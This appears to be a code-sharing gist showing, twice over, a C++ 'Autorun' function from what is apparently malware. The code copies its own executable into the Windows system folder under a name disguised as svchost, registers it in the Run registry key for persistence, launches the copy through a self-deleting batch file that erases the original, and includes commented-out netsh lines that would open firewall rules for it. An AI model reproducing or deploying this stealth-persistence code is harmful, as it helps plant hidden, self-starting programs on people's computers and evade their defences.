kostyll · May 30, 2016 12:58
diff --git a/gistfile1.cpp b/gistfile1.cpp
 bool Autorun(char *Path) // complex stealth method: moving to %system32%, autorun, making firewall exception and destruction of first instance
 {
     HKEY key;
     char runkey[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
     char valuename[] = "svchost";
     char filename[61];
     char Win_Dir[33];
     GetSystemDirectory(Win_Dir, sizeof Win_Dir);
     sprintf(filename,"%s\\sv�host.exe", Win_Dir);
 	 if (strcmp(filename, Path) == 0)
 	 {
 		 return false;
 	 }
 	 else if (strcmp(filename, Path) != 0)
 	 {
 		CopyFile(Path, filename, 0);
 		RegCreateKeyEx(HKEY_LOCAL_MACHINE, runkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
 		RegSetValueEx(key, valuename, 0, REG_SZ, (LPBYTE)filename, 33);
 		RegCloseKey(key);
 		std::ofstream bat("destroy.bat");
 		bat << "chcp 1251 > nul" << std::endl;
 		bat << "ping -n 1 -w 1000 127.0.0.1 > nul" << std::endl;
 		bat << "cd " << Win_Dir << std::endl;
 		bat << "start \"something\", " << filename << std::endl;
 		bat << "cd %~dp0" << std::endl;
 		//bat << "Netsh Advfirewall Firewall Add rule name= dir=in action=allow enable=yes protocol=any program=" << filename << " localport=any remoteport=any > nul" << std::endl;
 		//bat << "Netsh Advfirewall Firewall Add rule name= dir=out action=allow enable=yes protocol=any program=" << filename << " localport=any remoteport=any > nul" << std::endl;
 		bat << "del " << "\"" << Path << "\"" << std::endl;
 		bat << "del destroy.bat" << std::endl;
 		bat.close();
 		ShellExecute(NULL, (LPCSTR)"open", (LPCSTR)"destroy.bat", NULL, NULL, NULL);
 		return true;
 	 }
 	 return true;
 }
	bool Autorun(char *Path) // complex stealth method: moving to %system32%, autorun, making firewall exception and destruction of first instance
	{
	HKEY key;
	char runkey[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
	char valuename[] = "svchost";
	char filename[61];
	char Win_Dir[33];
	GetSystemDirectory(Win_Dir, sizeof Win_Dir);
	sprintf(filename,"%s\\sv�host.exe", Win_Dir);
	if (strcmp(filename, Path) == 0)
	{
	return false;
	}
	else if (strcmp(filename, Path) != 0)
	{
	CopyFile(Path, filename, 0);
	RegCreateKeyEx(HKEY_LOCAL_MACHINE, runkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
	RegSetValueEx(key, valuename, 0, REG_SZ, (LPBYTE)filename, 33);
	RegCloseKey(key);
	std::ofstream bat("destroy.bat");
	bat << "chcp 1251 > nul" << std::endl;
	bat << "ping -n 1 -w 1000 127.0.0.1 > nul" << std::endl;
	bat << "cd " << Win_Dir << std::endl;
	bat << "start \"something\", " << filename << std::endl;
	bat << "cd %~dp0" << std::endl;
	//bat << "Netsh Advfirewall Firewall Add rule name= dir=in action=allow enable=yes protocol=any program=" << filename << " localport=any remoteport=any > nul" << std::endl;
	//bat << "Netsh Advfirewall Firewall Add rule name= dir=out action=allow enable=yes protocol=any program=" << filename << " localport=any remoteport=any > nul" << std::endl;
	bat << "del " << "\"" << Path << "\"" << std::endl;
	bat << "del destroy.bat" << std::endl;
	bat.close();
	ShellExecute(NULL, (LPCSTR)"open", (LPCSTR)"destroy.bat", NULL, NULL, NULL);
	return true;
	}
	return true;
	}